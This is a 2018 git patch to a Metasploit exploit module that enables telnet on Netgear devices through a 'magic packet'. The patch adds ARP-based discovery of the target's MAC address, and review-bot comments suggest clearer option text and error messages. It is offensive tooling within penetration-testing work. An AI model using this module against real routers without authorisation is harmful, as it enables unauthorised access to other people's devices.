From 6dbf9445c9578d559a1faaf4977f5687461ff1e1 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Fri, 2 Mar 2018 19:02:44 -0600
Subject: [PATCH] Add MAC address discovery
---
 .../linux/telnet/netgear_telnetenable.rb | 31 +++++++++++++++++--
 1 file changed, 29 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb
index fe0afe3498..99fb159296 100644
--- a/modules/exploits/linux/telnet/netgear_telnetenable.rb
+++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::Remote::Udp
 include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Capture
 def initialize(info = {})
 super(update_info(info,
@@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options([
 Opt::RPORT(23),
- OptString.new('MAC', [true, 'MAC address of device']),
+ OptString.new('MAC', [false, 'MAC address of device']),
 OptString.new('USERNAME', [false, 'Username on device']),
 OptString.new('PASSWORD', [false, 'Password on device'])
 ])
@@ -84,6 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote
 @proto = target[:proto]
 detect_proto if @proto == :auto
+ # Use supplied or ARP-cached MAC address
+ configure_mac if @do_exploit
+
 # Use supplied or default creds
 configure_creds if @do_exploit
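Review bot: The `MAC` option becomes optional at the `OptString.new('MAC', ...)` line, but its description still reads `'MAC address of device'`, so the option listing does not say what happens when it is left unset. The fallback added later in this commit opens a pcap handle and fails with `Superuser access required`, which an operator would otherwise only learn at run time. I would change the line to `OptString.new('MAC', [false, 'MAC address of device (discovered via ARP if unset; needs capture privileges)']),`. The `register_options` call is fully visible here, but the enclosing `initialize` starts and ends outside the hunk.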
@@ -120,6 +124,29 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 end
+ def configure_mac
+ @mac = datastore['MAC']
+
+ return if @mac
+
+ print_status('Attempting to discover MAC address via ARP')
+
+ begin
+ open_pcap
+ @mac = lookup_eth(rhost).first
+ rescue RuntimeError
+ fail_with(Failure::BadConfig, 'Superuser access required')
+ ensure
+ close_pcap
+ end
+
+ if @mac
+ print_good("Found MAC address #{@mac}")
+ else
+ fail_with(Failure::Unknown, 'Could not find MAC address')
+ end
+ end
+
 def configure_creds
 @username = datastore['USERNAME'] || target[:username]
 @password = datastore['PASSWORD'] || target[:password]
@@ -136,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
 def exploit_telnetenabled
 print_status('Generating magic packet')
- payload = magic_packet(datastore['MAC'], @username, @password)
+ payload = magic_packet(@mac, @username, @password)
 begin
 print_status("Connecting to telnetenabled via #{@proto.upcase}")
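Review bot: In `configure_mac`, the bare `rescue RuntimeError` reports every RuntimeError raised by `open_pcap` or `lookup_eth` as `Superuser access required`, so a failure with a different cause is labelled a privilege problem and the original message is discarded. Keeping the message makes the failure diagnosable: `rescue RuntimeError => e` followed by `fail_with(Failure::BadConfig, "Could not open capture (superuser access required?): #{e.message}")`. The method also has no comment; a short one should state that an operator-supplied `MAC` takes precedence and is used as given, and that the ARP lookup presumably only yields the device's own address when `rhost` is on the local segment. The behaviour of `lookup_eth` is not visible in this patch, so that last point should be confirmed against the mixin.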